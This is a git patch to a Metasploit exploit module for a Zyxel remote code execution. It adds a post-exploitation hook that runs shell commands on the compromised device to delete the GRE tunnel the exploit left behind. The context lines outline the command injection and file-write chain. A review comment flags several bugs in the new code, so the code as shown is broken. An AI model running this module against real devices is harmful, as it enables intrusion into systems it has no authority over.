From d8d1ea7ffb8c1a210bffc1925bc700459823aeb4 Mon Sep 17 00:00:00 2001
From: Jack Heysel
Date: Wed, 29 May 2024 16:04:00 -0400
Subject: [PATCH] Added on_new_session method
---
 .../linux/http/zyxel_parse_config_rce.rb | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
diff --git a/modules/exploits/linux/http/zyxel_parse_config_rce.rb b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
index ee53c22662..e1b6271aaf 100644
--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -80,6 +80,27 @@ class MetasploitModule < Msf::Exploit::Remote
 CheckCode::Unknown('Version and product info were unable to be determined.')
 end
+ def on_new_session(session)
+ super
+ command_output = ''
+ # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs.
+ if session.type.to_s.eql? 'meterpreter'
+ newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\""
+ print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")
+ command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\""
+ elsif session.type.to_s.eql? 'shell'
+ newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1"
+ print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")
+ command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"
+ end
+
+ if command_output.includes?('success')
+ print_good('The GRE interface was successfully removed.')
+ else
+ print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')
+ end
+ end
+
 def exploit
 # Command injection has a 0x14 byte length limit so keep the file name as small as possible.
 # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.
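Review bot: `command_output.includes?('success')` in the new on_new_session will raise NoMethodError on every session, because Ruby's String defines `include?` and no `includes?`; change it to `if command_output.to_s.include?('success')`. The delete command is also issued even when the lookup returns nothing, producing an `ifconfig  down` with an empty interface name, so guard each branch before the delete with `return print_warning('No GRE tunnel interface was found; skipping cleanup.') if newest_gre.to_s.strip.empty?`. In the meterpreter branch `session.sys.process.execute` appears to return a process handle rather than the command's stdout, so neither newest_gre nor command_output is likely to be a string there — worth confirming, or routing both session types through one helper that returns captured output. The warning string also doubles "unless unless". The enclosing class continues outside the hunk.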